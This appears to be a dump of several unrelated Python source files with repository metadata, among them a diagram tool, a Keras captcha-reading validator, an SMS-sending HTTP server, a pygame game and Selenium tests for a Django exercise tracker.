frames on the stack. UGH.
"""
self.ref = Snapshot()
def make_stack(self):
"""Takes a snapshot of the current state.
Subtract away the frames and variables that existed in the
previous reference, then makes a Stack.
"""
self.snapshot = Snapshot()
self.snapshot.clean(self.ref)
self.values = {}
self.classes = []
self.stack = Stack(self, self.snapshot)
def register(self, thing, val):
"""Associates a value with the Thing that represents it.
Later we can check whether we have already created
a Thing for a given value.
"""
thing.lumpy = self
thing.val = val
self.values[id(val)] = thing
def lookup(self, val):
"""Check whether a value is already represented by a Thing.
Returns:
an existing Thing or None.
"""
vid = id(val)
return self.values.get(vid, None)
def object_diagram(self, obj=None, loop=True):
"""Creates a new object diagram based on the current state.
If an object is provided, draws the object. Otherwise, draws
the current run-time stack (relative to the last reference).
"""
if obj:
thing = make_thing(self, obj)
else:
if self.stack == None:
self.make_stack()
thing = self.stack
# if there is already an Object Diagram, clear it; otherwise,
# create one
if self.od:
self.od.clear()
else:
self.od = ObjectDiagram(self)
# draw the object or stack, then the arrows
drawn = self.od.draw(thing)
self.od.draw_arrows()
# wait for the user
if loop:
self.mainloop()
return Thing.things_drawn
def class_diagram(self, classes=None, loop=True):
"""Create a new object diagram based on the current state.
If a list of classes is provided, only those classes are
shown. Otherwise, all classes that Lumpy know about are shown.
"""
# if there is not already a snapshot, make one
if self.stack == None:
self.make_stack()
        # scan the stack looking for has-a
# relationships (note that we can't do this until the
# stack is complete)
for val in list(self.values.values()):
if isinstance(val, Instance) and val.cls is not None:
val.scan_bindings(val.cls)
# if there is already a class diagram, clear it; otherwise
# create one
if self.cd:
self.cd.clear()
else:
self.cd = ClassDiagram(self, classes)
self.cd.draw()
if loop:
self.mainloop()
return Thing.things_drawn
def get_class_list(self):
"""Returns list of classes that should be drawn in a class diagram."""
t = []
for cls in self.classes:
if not self.is_opaque(cls.classobj):
t.append(cls)
elif cls.parents or cls.childs:
t.append(cls)
return t
class Diagram(object):
"""Parent class for ClassDiagram and ObjectDiagram."""
def __init__(self, lumpy, title):
self.lumpy = lumpy
self.arrows = []
self.tl = lumpy.tl()
self.tl.title(title)
self.tl.geometry('+0+0')
self.tl.protocol("WM_DELETE_WINDOW", self.close)
self.setup()
def ca(self, width=100, height=100, **options):
"""make a canvas for the diagram"""
return self.lumpy.widget(DiagCanvas, width=width, height=height,
**options)
def setup(self):
"""create the gui for the diagram"""
# push the frame for the toplevel window
self.lumpy.pushfr(self.tl)
self.lumpy.col([0, 1])
# the frame at the top contains buttons
self.lumpy.row([0, 0, 1], bg='white')
self.lumpy.bu(text='Close', command=self.close)
self.lumpy.bu(text='Print to file:', command=self.printfile_callback)
self.en = self.lumpy.en(width=10, text='lumpy.ps')
self.en.bind('<Return>', self.printfile_callback)
self.la = self.lumpy.la(width=40)
self.lumpy.endrow()
# the grid contains the canvas and scrollbars
self.lumpy.gr(2, [1, 0])
self.ca_width = 1000
self.ca_height = 500
self.canvas = self.ca(self.ca_width, self.ca_height, bg='white')
yb = self.lumpy.sb(command=self.canvas.yview, sticky=N+S)
xb = self.lumpy.sb(command=self.canvas.xview, orient=HORIZONTAL,
sticky=E+W)
self.canvas.configure(xscrollcommand=xb.set, yscrollcommand=yb.set,
scrollregion=(0, 0, 800, 800))
self.lumpy.endgr()
self.lumpy.endcol()
self.lumpy.popfr()
# measure some sample letters to get the text height
# and set the scale factor for the canvas accordingly
self.canvas.clear_transforms()
bbox = self.canvas.measure(['bdfhklgjpqy'])
self.unit = 1.0 * bbox.height()
transform = ScaleTransform([self.unit, self.unit])
self.canvas.add_transform(transform)
def printfile_callback(self, event=None):
"""Dumps the contents of the canvas to a file.
Gets the filename from the filename entry.
"""
filename = self.en.get()
self.printfile(filename)
def printfile(self, filename):
"""Dumps the contents of the canvas to a file.
filename: string output file name
"""
# shrinkwrap the canvas
bbox = self.canvas.bbox(ALL)
width = bbox.right*self.unit
height = bbox.bottom*self.unit
self.canvas.config(width=width, height=height)
# write the file
self.canvas.dump(filename)
self.canvas.config(width=self.ca_width, height=self.ca_height)
self.la.config(text='Wrote file ' + filename)
def close(self):
"""close the window and exit"""
self.tl.withdraw()
self.lumpy.quit()
def add_arrow(self, arrow):
"""append a new arrow on the list"""
self.arrows.append(arrow)
def draw_arrows(self):
"""draw all the arrows on the list"""
for arrow in self.arrows:
arrow.draw(self)
def update_arrows(self, n=None):
"""update up to n arrows (or all of them is n==None)"""
i = 0
for arrow in self.arrows:
arrow.update()
i += 1
if n and i > n: break
class ObjectDiagram(Diagram):
"""Represents an object diagram."""
def __init__(self, lumpy=None):
Diagram.__init__(self, lumpy, 'Object Diagram')
def draw(self, thing):
"""Draws the top-level Thing."""
drawn = thing.draw(self, Point([2, 2]), flip=1)
# configure the scroll region
self.canvas.scroll_config()
return drawn
def clear(self):
"""Clears the diagram."""
self.arrows = []
self.tl.deiconify()
self.canvas.delete(ALL)
class ClassDiagram(Diagram):
"""Represents a class diagram."""
def __init__(self, lumpy, classes=None):
Diagram.__init__(self, lumpy, 'Class Diagram')
self.classes = classes
def draw(self):
"""Draw the class diagram.
Includes the classes in self.classes,
or if there are none, then all the classes Lumpy has seen.
"""
pos = Point([2, 2])
if self.classes == None:
classes = self.lumpy.get_class_list()
else:
classes = [make_thing(self.lumpy, cls) for cls in self.classes]
# find the classes that have no parents, and find the
# height of each tree
roots = [c for c in classes if c.parents == []]
for root in roots:
root.set_height()
# for all the leaf nodes, compute the distance to
# the parent
leafs = [c for c in classes if c.childs == []]
for leaf in leafs:
leaf.set_depth()
# if we're drawing all the classes, start with the roots;
# otherwise draw the classes we were given.
if self.classes == None:
drawn = self.draw_classes(roots, pos)
else:
drawn = self.draw_classes(classes, pos)
self.draw_arrows()
# configure the scroll region
self.canvas.scroll_config()
def draw_classes(self, classes, pos, tags=tuple()):
"""Draw this list of classes and all their subclasses.
Starts at the given position.
Returns:
list of all classes drawn
"""
p = pos.copy()
alldrawn = []
for c in classes:
drawn = c.cdc.draw(self, p, tags)
alldrawn.extend(drawn)
# author_TODO: change this so it finds the bottom-most bbox in drawn
bbox = c.cdc.get_bbox()
for thing in alldrawn:
if thing is not c:
# can't use bbox.union because it assumes that
# the positive y direction is UP
bbox = union(bbox, thing.get_bbox())
p.y = bbox.bottom + 2
for c in classes:
for d in c.refers:
a = ContainsArrow(self.lumpy, c.cdc, d.cdc)
self.arrows.append(a)
return alldrawn
def union(one, other):
"""Returns a new bbox that covers one and other.
Assumes that the positive y direction is DOWN.
"""
left = min(one.left, other.left)
right = max(one.right, other.right)
top = min(one.top, other.top)
bottom = max(one.bottom, other.bottom)
return BBox([[left, top], [right, bottom]])
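# Worked example: union(BBox([[0, 0], [2, 2]]), BBox([[1, 1], [3, 3]]))
# yields BBox([[0, 0], [3, 3]]) under the y-down convention used here.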
###########################
# test code below this line
###########################
def main(script, *args, **kwds):
class Cell:
def __init__(self, car=None, cdr=None):
self.car = car
self.cdr = cdr
def __hash__(self):
return hash(self.car) ^ hash(self.cdr)
def func_a(x):
t = [1, 2, 3]
t.append(t)
y = None
z = 1
long_name = 'allen'
d = dict(a=1, b=2)
func_b(x, y, t, long_name)
def func_b(a, b, s, name):
d = dict(a=1, b=(1, 2, 3))
cell = Cell()
cell.car = 1
cell.cdr = cell
func_c()
def func_c():
t = (1, 2)
c = Cell(1, Cell())
d = {}
d[c] = 7
d[7] = t
d[t] = c.cdr
LUMPY.object_diagram()
func_a(17)
if __name__ == '__main__':
LUMPY = Lumpy()
LUMPY.make_reference()
main(*sys.argv)
|
[
"450096325@qq.com"
] |
450096325@qq.com
|
ceb7cb6f8c86412333ab9392d9aa1fc6635148f2
|
ba6fdc168ce09d187cfd06f086b04981ba04b2b0
|
/taller3.py
|
df847c149532795514dd55686de0adeb80a14387
|
[] |
no_license
|
milerojas22/claseleo
|
09ee08a70001e5d7c29f9e750a50395de7d59ce6
|
abdebc683825f88bd90e9e8492278747c2964874
|
refs/heads/master
| 2020-05-14T11:23:49.645805
| 2019-04-17T17:12:48
| 2019-04-17T17:12:48
| 181,776,618
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
lista=[]
total=0
for n in range(10):
    numero = int(input('Enter a number: '))
lista.append(numero)
total = total + numero
media = total/10
print(lista)
print('The sum of the numbers is: ', total)
print('The mean of the numbers is: ', media)
|
[
"noreply@github.com"
] |
milerojas22.noreply@github.com
|
ff911b73f444a01ff61fb583fc88cb2d68d51835
|
faef34f960744959556f57b4507802e502b77159
|
/mainapp/migrations/0003_auto_20201123_0304.py
|
5f8df5a7242c31edc4a5e13a40e2ff8653fb46ac
|
[] |
no_license
|
m1ger1/roboplatform
|
2437d2122d1fcbde551fe95cd087ea85154ec066
|
1408f453418a28710b89c29aa6cbca6dbe1f0d02
|
refs/heads/master
| 2023-05-27T10:40:25.503728
| 2021-01-11T12:11:59
| 2021-01-11T12:11:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
# Generated by Django 3.1.3 on 2020-11-23 00:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0002_lesson_kit'),
]
operations = [
migrations.RemoveField(
model_name='lesson',
name='kit',
),
migrations.AddField(
model_name='lesson',
name='file_path',
            field=models.TextField(blank=True, verbose_name='path to the presentation'),
),
]
|
[
"brainnugget50@gmail.com"
] |
brainnugget50@gmail.com
|
fdde8e83ba117d2ea66f9539b6c792b0bcbe5cfe
|
1d814ce93d4be5dc4b8ebf8b68225469e6b70e63
|
/captcha/validate.py
|
3d4d5b6c248ff8fc2ad29c91a66d776abf2eac96
|
[
"MIT"
] |
permissive
|
cimi/cscg-2020
|
3296f228af46bcc77ff419cb6a882616c6589e59
|
62377bbad3ed5bcaea5e80e032b73a7dbb73e1d0
|
refs/heads/master
| 2022-10-02T03:15:35.856086
| 2020-06-07T13:34:18
| 2020-06-07T13:34:18
| 268,373,490
| 4
| 4
| null | 2020-05-31T22:20:00
| 2020-05-31T22:16:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,772
|
py
|
from keras.models import load_model
from keras.preprocessing import image
from sklearn.preprocessing import LabelEncoder
from processor import split_image
import cv2
import numpy as np
import os
def get_encodings():
letters = []
for filename in os.listdir('training/letters/'):
if '-' not in filename:
continue
letter = filename.split('-')[0]
letters.append(letter)
encoder = LabelEncoder()
labels = encoder.fit_transform(letters)
encodings = {}
for idx, l in enumerate(letters):
encodings[labels[idx]] = l
return encodings
def decode_results(results, encodings):
guess = ""
for result in results:
max_idx, max_val = -1, -1
for idx, prob in enumerate(result):
if prob > max_val:
max_idx, max_val = idx, prob
guess += encodings[max_idx]
return guess
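# Worked example (hypothetical probabilities): with encodings {0: 'a', 1: 'b'},
# decode_results([[0.2, 0.8], [0.9, 0.1]], encodings) takes the argmax of each
# row and returns 'ba'.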
def validate(model_file):
validation_dir = "captchas/"
encodings = get_encodings()
model = load_model(model_file)
total, success = 0, 0
for filename in os.listdir(validation_dir):
total += 1
letters = split_image(validation_dir + filename)
captcha = filename.split(".")[0]
tmpfile = "tmp-letter.png"
images = []
for l in letters:
cv2.imwrite(tmpfile, l)
img = image.load_img(tmpfile, target_size=[30, 30, 1], color_mode='grayscale')
img = image.img_to_array(img)
img = img/255
images.append(img)
results = model.predict(np.array(images), verbose=0)
guess = decode_results(results, encodings)
if guess == captcha:
success += 1
success_percentage = (success / total) * 100
if success_percentage < 99:
print(f"๐ซ {model_file} success too low: {success_percentage:.2f}%")
else:
print(f"โ
{model_file} is a great success: {success_percentage:.2f}%")
|
[
"alexandru.ciminian@datadoghq.com"
] |
alexandru.ciminian@datadoghq.com
|
d28eff1868de620720a05348c3fdaf9a7e1b03c0
|
028a5df3cfe1560f007a8f1b8526bd53a911f913
|
/inf3331/assignment3/addition_testing.py
|
569cf2cd5df0960861126d1431c429ca3baf762e
|
[] |
no_license
|
danielosen/code
|
243b55ef896af6ac2de9f9ada4221bb9f201c196
|
05d45c8299fda9711f747d5c4c7051d11d11a0ee
|
refs/heads/master
| 2021-01-23T05:34:53.889322
| 2017-05-31T18:17:59
| 2017-05-31T18:17:59
| 92,972,954
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 955
|
py
|
from my_unit_testing import UnitTest
def better_addition(a, b, num_rechecks=2):
"""Returns sum of a, b, but double checks answer several times."""
sum_computations = [a + b for n in range(num_rechecks)]
for n in range(num_rechecks):
if sum_computations[n] != sum_computations[n-1]:
print("Hang on, let me recheck that")
return better_addition(a, b, num_rechecks)
return sum_computations[0] # if all computations match, return whichever
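# e.g. better_addition(4, 7) computes 4 + 7 num_rechecks times and, since the
# results always agree, returns 11 without any rechecking.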
num_tests = 0
num_passed = 0
for a, b, n, r in [(4, 7, 0, 11),
(4, 7, 4, 11),
(2, 2, 2, 4)]:
test = UnitTest(better_addition, # UnitTest() calls the __init__ method
[a, b], {"num_rechecks": n}, r)
    num_tests += 1
if test(): # calls the __call__ method
num_passed += 1
print("{}/{} tests passed".format(num_passed, num_tests))
|
[
"noreply@github.com"
] |
danielosen.noreply@github.com
|
f007ba5d6aa59a34b0b98a5351546bea5223f172
|
212d3a4ccd591a741df36e8d073b1be8b09b00cd
|
/BackEnd/server.py
|
5b51641911158c741f1b9f861f98fa4972f9c095
|
[] |
no_license
|
BITNP/group-message-system
|
a9f7cd81ad7b79b1d67e80a6f456791dcf410b12
|
0f6354b3bf567fe0ed3b604641b9d942696b50d7
|
refs/heads/master
| 2020-03-28T06:39:10.849698
| 2018-10-30T18:26:27
| 2018-10-30T18:26:27
| 147,850,354
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,871
|
py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
import json
import requests
import MySQLdb
import os
import hashlib
import databaseIO.databaseIO as dbIO
HOST = ''
PORT = 29999
ADDR = (HOST, PORT)
# HTTP/1.1 404 Not Found
# Server: 360wzws
# Date: Fri, 29 Jun 2018 15:33:21 GMT
# Content-Type: text/html
# Content-Length: 479
# Connection: close
# X-Powered-By-360WZB: wangzhan.360.cn
# ETag: "5a7e7448-1df"
# WZWS-RAY: 114-1530315201.377-s9lfyc2
try:
with open('config.json') as f:
config_dict = json.load(f)
except:
    print('Failed to read config.json, please check the configuration')
exit(1)
apikey = os.getenv('YUNPIAN_APIKEY') or config_dict['yunpian']['apikey']
# DBHOSTNAME, DBUSERNAME,
# DBPASSWORD, DBDBNAME, DBPORT
DBHOSTNAME = os.getenv('DB_HOSTNAME') or config_dict['databaseIO']['host']
DBUSERNAME = os.getenv('DB_USERNAME') or config_dict['databaseIO']['username']
DBPASSWORD = os.getenv('DB_PASSWORD') or config_dict['databaseIO']['password']
DBDB = os.getenv('DB_DB') or config_dict['databaseIO']['db']
DBPORT = os.getenv('DB_PORT') or config_dict['databaseIO']['port']
PORT = os.getenv('SERVER_PORT') or config_dict['server_port']
LATEST_QT_VERSION = os.getenv(
    'LATEST_QT_VERSION') or config_dict['latest_qt_version'] or '0.0.0'
# PORT may have been overridden above, so rebuild ADDR (it was first computed
# before the config was read)
ADDR = (HOST, int(PORT))
# start_time = '2018-06-11 00:00:00'
# end_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
def replaceText(raw_text, replaceTo: list, whereToReplace: list):
text = raw_text
for i in range(len(whereToReplace)):
text = text.replace(whereToReplace[i], replaceTo[i])
return text
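# Worked example (hypothetical values): replaceText('Hi #name#', ['Ann'], ['#name#'])
# returns 'Hi Ann'; each marker in whereToReplace is swapped for the
# corresponding entry in replaceTo.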
def process_resquest(dict_data):
code = str(dict_data['request_code'])
if code == '1.5':
response = requests.post(
'https://sms.yunpian.com/v2/sms/get_record.json', data=dict_data)
elif code == '1.4':
"""
        Note: mobile must be passed in as a comma-separated string
        (Yunpian only); param must be passed in as a list (Yunpian),
        i.e. it is the tpl_value.
"""
payload_list = []
text_list = [replaceText(
dict_data['content'], param, dict_data['replace']) for param
in dict_data['param']]
print('HERE')
for mobile, text in zip(dict_data['mobile'], text_list):
payload_list.append(dict(apikey=dict_data['apikey'],
mobile=mobile,
text=text)
)
# payload = dict(apikey=dict_data['apikey'],
# mobile=','.join(dict_data['mobile'])
# )
# text_list = [replaceText(
# dict_data['content'], param, dict_data['replace']) for param in dict_data['param']]
# payload['text'] = ','.join(text_list)
print(payload_list)
dict_result = dict(total_count=0, total_fee=0.00, unit="RMB", data=[])
for payload in payload_list:
time.sleep(0.1)
response = requests.post(
'https://sms.yunpian.com/v2/sms/single_send.json', data=payload
)
# response = requests.post(
# 'https://sms.yunpian.com/v2/sms/multi_send.json', data=payload
# )
result = response.json()
            # exception handling
print(response.json())
            if 'http_status_code' in result:  # the API call went through, but returned an error
                # append a failure record directly to the results
                # Note: this is an abnormal error, not something like
                # exceeding the character limit
dict_result['data'].append(dict(
code=1,
msg=result['detail'],
count=0,
fee=0.0,
unit="RMB",
mobile=payload['mobile'],
sid=10101010101
))
                print('API call went through but returned an error', payload, result)
continue
return '{"code":234,"msg":"'+result['detail']+'"}'
#
dict_result['data'].append(result)
dict_result['total_count'] += 1
dict_result['total_fee'] += result['fee']
result_data = [dict(sid=i['sid'], param=str(j), mobile=i['mobile'],
result=i['code'], errmsg=i['msg'], fee=i['fee'])
for i, j in zip(dict_result['data'], dict_data['param'])
]
db.Send(dict_data['id'], '', 1, None, dict_data['content'],
dict_result['total_fee'], dict_result['total_count'], result_data)
return json.dumps(dict_result, ensure_ascii=False)
elif code == '1.1':
response = requests.post(
'https://sms.yunpian.com/v2/tpl/get_default.json', data=dict_data)
elif code == '1.2':
response = requests.post(
'https://sms.yunpian.com/v2/tpl/get.json', data=dict_data)
print(response.json())
        # process according to tplIDList TODO
tpl_list = db.getUserTpl(dict_data['id'], 1)
        print('templates stored in the database:', tpl_list)
result = response.json()
# ๅผๅธธๅค็
if 'http_status_code' in result:
return json.dumps(result, ensure_ascii=False)
if isinstance(result, dict):
result = [result]
        # the next statement filters the results; remember to comment it out in production
result = list(filter(lambda x: str(x['tpl_id']) in tpl_list, result))
return json.dumps(result, ensure_ascii=False)
elif code == '1.3':
response = requests.post(
'https://sms.yunpian.com/v2/tpl/add.json', data=dict_data)
dict_result = response.json()
print(dict_result)
        if 'http_status_code' in dict_result:  # the API call went through, but returned an error
return '{"code":233,"msg":"'+dict_result['detail']+'"}'
affect_row_num = db.addUserTpl(
dict_data['id'], dict_result['tpl_id'], 1, dict_result['tpl_content'],
None, dict_result['check_status'], None)
print(affect_row_num)
return '{"success":true}'
elif code == '6':
res = db.checkSendResult(dict_data['id'])
return json.dumps(res, ensure_ascii=False)
elif code == '7':
fee, paid, *_ = db.getUserInfo(dict_data['id'])
return json.dumps(dict(fee=float(fee), paid=float(paid)))
else:
return None
return response.text
class MyRequestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
super(MyRequestHandler, self).__init__(request, client_address, server)
def _set_headers(self, status=True):
if not status:
self.send_response(404)
self.send_header('Content-type', 'application/json')
self.end_headers()
return
else:
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def process_json(self, raw_data):
try:
dict_data = json.loads(raw_data.decode('utf-8'))
except:
self._set_headers(False)
            # exception handling TODO
print('=='*10, '\n'+raw_data.decode('utf-8')+'\n', '=='*10)
json.loads(raw_data)
return None, False
else:
dict_data.update(
dict(apikey=apikey))
return dict_data, True
def _check_dict(self, data: dict, *args):
for i_str in args:
if i_str not in data:
self._set_headers(False)
string = '{"code":251,"msg":"'+i_str+' not in json"}'
self.wfile.write(string.encode())
return False
return True
def do_GET(self):
print(str(self.path), str(self.headers))
self._set_headers()
# self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
        # a configuration file may be used for this later
        json_string = '{"api":["Yunpian (replies not supported)","Tencent (replies supported)"],"new_qt_version":"' + \
            LATEST_QT_VERSION+'"}'
self.wfile.write(json_string.encode())
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
        # step 0: parse the JSON data into a dict; bail out on any error
# <--- Gets the size of data
content_length = int(self.headers['Content-Length'])
# <--- Gets the data itself
post_data = self.rfile.read(content_length)
dict_data, status = self.process_json(post_data)
if not status:
self.wfile.write('{"code":250,"msg":"้jsonๆ ผๅผ"}'.encode('utf-8'))
return
        # step 1: verify identity against the database and extract user info
if not self._check_dict(dict_data, "username", "password", "request_code"):
return
myid = db.identifyUser(dict_data['username'], dict_data['password'])
if myid is not None:
myinfo = db.getUserInfo(myid)
print('get info :', myinfo)
            print('authentication succeeded')
else:
self._set_headers(False)
self.wfile.write(
'{"code":252,"msg":"error username or password"}'.encode('utf-8'))
return
# print(hashlib.md5("whatever your string is".encode('utf-8')).hexdigest())
        # step 2: process the remaining info and send it to the API
dict_data.update(dict(apikey=apikey, id=myid))
print(dict_data)
        # step 3: filter the response and return it if needed; otherwise return it directly
response_text = process_resquest(
dict_data)
if response_text is None:
self._set_headers(False)
self.wfile.write(
'{"code":254,"msg":"error request_code"}'.encode())
return
print(response_text)
self._set_headers()
        self.wfile.write(response_text.encode())  # format of the data sent back to the front end
def run(server_class=HTTPServer, handler_class=MyRequestHandler):
"""
    Run the listening loop.
:param server_class=HTTPServer:
:param handler_class=MyRequestHandler:
"""
httpd = server_class(ADDR, handler_class)
print('start waiting for connection...')
httpd.serve_forever()
httpd.server_close()
def init():
"""
    Initialize the database connection
"""
try:
print(DBHOSTNAME, DBUSERNAME,
DBPASSWORD, DBDB, int(DBPORT))
db = dbIO.databaseIO(DBHOSTNAME, DBUSERNAME,
DBPASSWORD, DBDB, int(DBPORT))
except MySQLdb.OperationalError as e:
        print('database connection failed', e)
exit(1)
return None
else:
return db
if __name__ == '__main__':
time.sleep(7)
db = init()
run()
|
[
"loveress01@gmail.com"
] |
loveress01@gmail.com
|
ec664ac41515769e3c89fadff9679e0e257cfc80
|
275a53900c00f5601ea4ee748a5234c079cf7d03
|
/python/dimensions.py
|
28367c205e94a8d0388a5313e0660af577df414a
|
[] |
no_license
|
yangzhi1992/com.yangzhi
|
cb3f6a32b334aedb07920f46be859ff71305ef41
|
5125e83b097fe4627b6c764d8cf8c80a2c433020
|
refs/heads/master
| 2022-12-24T13:49:00.004808
| 2021-02-05T08:32:53
| 2021-02-05T08:32:53
| 94,555,037
| 0
| 0
| null | 2022-12-15T23:51:41
| 2017-06-16T15:03:39
|
Python
|
UTF-8
|
Python
| false
| false
| 208
|
py
|
dimensions = (200, 50)
print(dimensions[0])
print(dimensions[1])
for dimension in dimensions: print(dimension)
# "Modify" the tuple by rebinding the name (tuples themselves are immutable)
dimensions = (400, 100)
for dimension in dimensions: print(dimension)
|
[
"18255305960@163.com"
] |
18255305960@163.com
|
c104c748d49c8886c7bd2820bfa0e1350aadf4d0
|
42f73952d74b54c09d2125e70d4c368914d8b6e0
|
/alien_invasion.py
|
bd62aadff61926bc0c4aa7d08b907d09c52caa5a
|
[] |
no_license
|
satishraopublic/alieninvasion_python_learning
|
4b4f0bc780afe38f3aaf8e26cea34b054fbe65bc
|
a0bb1f6a83f75f70b70e16692800f96b2b862408
|
refs/heads/master
| 2020-11-26T17:34:24.539792
| 2019-12-20T00:26:21
| 2019-12-20T00:26:21
| 229,160,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,195
|
py
|
"""This module does blah blah."""
import sys
import pygame
from settings import Settings
from ship import Ship
class AlienInvasion:
"""Overall class to manage game assets and behavior."""
def __init__(self):
"""Initialize the game, create game resources """
pygame.init()
self.settings = Settings()
self.screen = pygame.display.set_mode((self.settings.screen_width, self.settings.screen_height))
pygame.display.set_caption("Alien Invasion")
self.ship = Ship(self)
def run_game(self):
"""Start the main loop for the game."""
while True:
# Watch for keyboard and mouse events.
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
# Redraw the screen during each pass through the loop.
self.screen.fill(self.settings.bg_color)
self.ship.blitme()
# Make the most recently drawn screen visible.
pygame.display.flip()
if __name__ == '__main__':
# Make a game instance, and run the game.
ai = AlienInvasion()
ai.run_game()
|
[
"Satish.Rao@hyland.com"
] |
Satish.Rao@hyland.com
|
18f042bb0f084e97263613d6449e4ee812df322e
|
d3e4b3e0d30dabe9714429109d2ff7b9141a6b22
|
/Visualization/GeometricDistributionVisualization.py
|
fbfed65f86cbcd01ebecf2fa1232a8b51ecbb3e1
|
[
"MIT"
] |
permissive
|
SymmetricChaos/NumberTheory
|
184e41bc7893f1891fa7fd074610b0c1520fa7dd
|
65258e06b7f04ce15223c1bc0c2384ef5e9cec1a
|
refs/heads/master
| 2021-06-11T17:37:34.576906
| 2021-04-19T15:39:05
| 2021-04-19T15:39:05
| 175,703,757
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
from Combinatorics.Distributions import GeometricDist
import matplotlib.pyplot as plt
D1 = GeometricDist(.7)
x1 = [i for i in range(5)]
y1 = [D1[i] for i in x1]
plt.scatter(x1,y1)
|
[
"ajfraebel@gmail.com"
] |
ajfraebel@gmail.com
|
57afc4a0527aaaeec405e6b4f5aac56b2d626423
|
7f7f144d393f41080df4e9b1a56781fa9300ffc4
|
/config.py
|
23672005dc6dba5a409a10c8d6a7292ce3966003
|
[] |
no_license
|
kusl/myflaskproject
|
4377295614e167524c14a6fe114b3eccdaaaccb6
|
badff41d75f87b885d4edf03d7a0eb8f3d428c87
|
refs/heads/master
| 2022-12-24T14:47:59.786155
| 2018-11-04T20:25:01
| 2018-11-04T20:25:01
| 155,693,473
| 0
| 0
| null | 2021-03-20T00:17:43
| 2018-11-01T09:42:58
|
Python
|
UTF-8
|
Python
| false
| false
| 907
|
py
|
#!/usr/bin/python
from configparser import ConfigParser
def config(filename='database.ini', section='postgresql'):
# create a parser
parser = ConfigParser()
# read config file
parser.read(filename)
# get section, default to postgresql
db = {}
if parser.has_section(section):
params = parser.items(section)
for param in params:
db[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
return db
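# Example usage (a sketch; assumes a database.ini with a [postgresql] section
# and that psycopg2 is the intended driver -- the driver is not named here):
#   params = config()
#   conn = psycopg2.connect(**params)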
def youtube(filename='database.ini', section='youtube'):
parser = ConfigParser()
parser.read(filename)
yt = {}
if parser.has_section(section):
params = parser.items(section)
for param in params:
yt[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
return yt
|
[
"kushaldeveloper@gmail.com"
] |
kushaldeveloper@gmail.com
|
2708b1428543747ec56290be32c256416258be61
|
3ce31eb855c6427a4ec9e803029949461b969adc
|
/fts/tests.py
|
a665637c279b1b10310058c31eb92358b35b3b18
|
[] |
no_license
|
pcp135/exercise
|
93b98aadfe3a955807ce6467361357f90fcd352b
|
4addbc308ec6b71cab4f127741bc9cbaf0ebd3a8
|
refs/heads/master
| 2021-01-25T10:29:02.912759
| 2012-07-28T22:06:46
| 2012-07-28T22:06:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,427
|
py
|
from django.test import LiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import login
class ExerciseTest(LiveServerTestCase):
fixtures = ['adminUser.json']
def setUp(self):
self.browser = webdriver.Firefox()
self._setup_workouts_via_admin()
def tearDown(self):
self.browser.quit()
pass
def _setup_workouts_via_admin(self):
self.browser.get(self.live_server_url + '/admin/')
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(login.un)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(login.pw)
password_field.send_keys(Keys.RETURN)
self.browser.find_element_by_link_text('Measures').click()
self.browser.find_element_by_link_text('Add measure').click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Length')
save_button = self.browser.find_element_by_name("_addanother")
save_button.click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Width')
save_button = self.browser.find_element_by_name("_save")
save_button.click()
self.browser.find_element_by_link_text('Getfit').click()
self.browser.find_element_by_link_text('Exercises').click()
self.browser.find_element_by_link_text('Add exercise').click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Jumping')
self.browser.find_elements_by_tag_name("option")[0].click()
save_button = self.browser.find_element_by_name("_addanother")
save_button.click()
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('Reaching')
self.browser.find_elements_by_tag_name("option")[1].click()
save_button = self.browser.find_element_by_name("_save")
save_button.click()
self.browser.find_element_by_link_text('Getfit').click()
self.browser.find_element_by_link_text('Workouts').click()
self.browser.find_element_by_link_text('Add workout').click()
self.browser.find_element_by_xpath("//select[@name='exercise']/option[@value='1']").click()
self.browser.find_element_by_link_text('Today').click()
self.browser.find_element_by_link_text('Now').click()
self.browser.find_element_by_xpath("//select[@name='score_set-0-measure']/option[@value='1']").click()
result = self.browser.find_element_by_xpath("//input[@name='score_set-0-result']")
result.send_keys('12345')
save_button = self.browser.find_element_by_name("_addanother")
save_button.click()
self.browser.find_element_by_xpath("//select[@name='exercise']/option[@value='2']").click()
self.browser.find_element_by_link_text('Today').click()
self.browser.find_element_by_link_text('Now').click()
self.browser.find_element_by_xpath("//select[@name='score_set-0-measure']/option[@value='2']").click()
result = self.browser.find_element_by_xpath("//input[@name='score_set-0-result']")
result.send_keys('67890')
save_button = self.browser.find_element_by_name("_save")
save_button.click()
self.browser.find_element_by_link_text('Log out').click()
def test_flow_through_the_site(self):
#Visit main page
self.browser.get(self.live_server_url)
body = self.browser.find_element_by_tag_name('body')
#Check all the admin setup stuff is shown
self.assertIn('Workouts', body.text)
self.assertIn('Jumping', body.text)
self.assertIn('Reaching', body.text)
#Visit the link for the first admin setup exercise
self.browser.find_element_by_link_text('Jumping').click()
body = self.browser.find_element_by_tag_name('body')
#and confirm details are correct
self.assertIn('Jumping', body.text)
self.assertIn('Length', body.text)
self.assertIn('12345', self.browser.page_source)
